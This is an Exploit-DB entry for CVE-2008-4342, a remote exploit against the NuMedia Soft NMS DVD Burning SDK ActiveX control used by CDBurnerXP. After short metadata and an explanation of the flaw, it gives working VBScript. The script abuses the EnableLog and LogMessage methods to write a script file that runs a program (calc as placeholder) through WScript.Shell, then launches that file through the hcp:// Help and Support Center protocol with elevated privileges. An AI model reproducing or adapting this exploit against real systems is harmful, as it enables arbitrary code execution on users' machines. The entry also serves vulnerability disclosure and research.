NuMedia Soft Nms DVD Burning SDK ActiveX NMSDVDX.dll Exploit

ID EDB-ID:6491
Type exploitdb
Reporter Nine:Situations:Group
Modified 2008-09-19T00:00:00


NuMedia Soft NMS DVD Burning SDK Activex (NMSDVDX.dll) Exploit. CVE-2008-4342. Remote exploit for windows platform

5.06 19/09/2008 -----------------------------------------------------------

-- NuMedia Soft NMS DVD Burning SDK Activex (NMSDVDX.dll) remote exploit --
by Nine:Situations:Group::bruiser

software site:
our site:

affected software: CDBurnerXP, ??
tested against IE6

RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe:  Safe for untrusted: caller,data  
IPersist Safe:  Safe for untrusted: caller,data  

mitigation: an "unlicensed software" box appears
however, if the user close it or click "OK", the code will run normally

explaination: "EnableLog" method can be used to overwrite a specified file,
"LogMessage" one to write new lines on it. 
Trough the Help and Support Center and the pluggable "hcp://" protocol you 
can launch your file. Important to note: the Help Center will host the page 
with elevated privileges, allowing the page to script arbitrary controls 
with no prompts presented to the user.
This was suggested by rgod (see hj forum) as a way to immediately execute
the shell

<title> :( </title>
<object classid='clsid:C2FBBB5F-6FF7-4F6B-93A3-7EDB509AA938' id='DVDEngineX' />

<script language='vbscript'>
    DVDEngineX.Initialize True
    DVDEngineX.EnableLog sLogFileName ,bCreateNew 
    'my garbage ...
    sMsg="<HTML>" & _
         "<SCRIPT LANGUAGE=VBScript>" & nl & _
         "Dim WshShell, oExec" & nl & _
         "Set WshShell = CreateObject(""WScript.Shell"")" & nl & _
         "Set oExec = WshShell.Exec(""calc"")" & nl & _ 
         "Do While oExec.Status = 0" & nl & _
         "WScript.Sleep 100" & nl & _
         "Loop" & nl & _
         "WScript.Echo oExec.Status" & nl & _
         "<" & Chr(47) & "SCRIPT>" & nl & _
         "<" & Chr(47) & "HTML>" 
    DVDEngineX.LogMessage sMsg 
    window.location = "hcp://system/sysinfo/msinfo.htm"


# [2008-09-19]